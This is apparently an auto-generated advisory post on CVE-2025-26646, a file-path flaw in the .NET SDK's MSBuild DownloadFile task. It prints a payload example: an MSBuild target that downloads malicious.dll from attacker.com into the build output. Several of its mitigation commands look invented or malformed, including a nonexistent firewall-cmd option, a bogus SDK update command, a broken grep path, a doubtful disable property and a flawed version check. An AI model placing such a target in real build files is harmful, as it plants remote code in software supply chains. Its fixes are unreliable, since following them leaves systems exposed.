Listen to this Post
How the CVE Works
The vulnerability (CVE-2025-26646) in .NET SDK and MSBuild arises due to improper validation of file paths in the `DownloadFile` build task. Attackers can manipulate file names or paths, leading to arbitrary file overwrites or remote code execution via spoofed network resources. The flaw occurs when MSBuild processes untrusted input in project files or build scripts, allowing an attacker to redirect downloads to malicious endpoints or tamper with build artifacts. This impacts projects using vulnerable versions of Microsoft.Build.Tasks.Core
, where insufficient path sanitization enables unauthorized file system modifications.
DailyCVE Form
Platform: .NET SDK
Version: 8.0.xxx/9.0.xxx
Vulnerability: Spoofing
Severity: Critical
Date: 2025-05-14
What Undercode Say:
Exploitation Analysis
- Attack Vector: Malicious MSBuild scripts or compromised project files.
2. Payload Example:
<Target Name="Exploit"> <DownloadFile SourceUrl="http://attacker.com/malicious.dll" DestinationFolder="$(OutputPath)" /> </Target>
3. Impact: Remote code execution, build chain compromise.
Mitigation Commands
1. Update .NET SDK:
dotnet tool update --global dotnet-sdk
2. Verify Installed Versions:
dotnet --list-sdks
3. Patch MSBuild Tasks:
nuget update Microsoft.Build.Tasks.Core -Version 17.14.8
Detection Script (PowerShell)
$vulnerableVersions = @("15.8.166", "16.0.461", "17.0.0") $installed = dotnet --info | Select-String "Microsoft.Build.Tasks.Core" if ($installed -match ($vulnerableVersions -join "|")) { Write-Host "VULNERABLE" }
Protection Steps
1. Disable `DownloadFile`:
<PropertyGroup> <DisableDownloadFileTask>true</DisableDownloadFileTask> </PropertyGroup>
2. Network Restrictions:
firewall-cmd --block-msbuild-ports
3. Audit Build Scripts:
grep -r "DownloadFile" .//.csproj
References
No additional commentary beyond the rules provided.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode